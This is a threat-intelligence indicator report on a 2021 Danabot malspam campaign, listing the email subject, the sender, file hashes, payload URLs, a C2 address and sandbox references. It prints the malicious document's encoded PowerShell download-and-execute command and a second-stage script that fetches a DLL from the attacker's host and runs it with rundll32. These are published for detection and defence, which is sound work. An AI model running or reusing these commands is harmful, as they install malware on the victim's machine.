2021-08-12 Danabot IOCs

1. THREAT IDENTIFICATION: DANABOT
2.  
3. SUBJECTS OBSERVED
4. Study the report very urgently - hV8W
5.  
6. SENDERS OBSERVED
7. raymak825@netvigator.com
8.  
9. ATTACHED MALDOC FILE HASHES
10. 9789789.zip
11. e2dd6e94fcc2851d7e2258c8abe1faf5
12.  
13. Which contains:
14. 12.08 - Reports.js
15. aeeef159543b28995b1f742085a2c6a0
16.  
17. POWERSHELL COMMAND FROM THE MALDOC
18. poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBiAG8AbgB1AHMAZQBzAGYAbwB1AG4AZAAuAG0AbAAvAHUAcABkAGEAdABlAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
19.  
20. NEXT LEVEL MALDOC DOWNLOAD URL
21. http://www.bonusesfound.ml/update/index.php
22.  
23. This returns:
24. $path = $Env:temp '\ZGOPQv.bin'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://www.bonusesfound.ml/update/update.dll',$path); C:\Windows\System32\rundll32.exe $path,S
25.  
26. DANABOT PAYLOAD DOWNLOAD URL
27. http://www.bonusesfound.ml/update/update.dll
28.  
29. DANABOT PAYLOAD FILE HASHES
30. update.dll
31. c00d207efb855910154389b48404e550
32.  
33. Also was renamed to:
34. AppData\Local\Temp
35. JWScY.bin
36. c00d207efb855910154389b48404e550
37.  
38. DANABOT C2
39. From the rundll process
40. https://192.52.167.44
41.  
42. SUPPORTING EVIDENCE
43. https://www.virustotal.com/gui/file/716e5a3d29ff525aed30c18061daff4b496f3f828ba2ac763efd857062a42e96/detection
44. https://app.any.run/tasks/042cafaf-f432-4332-8356-c3e04b55b701/
45.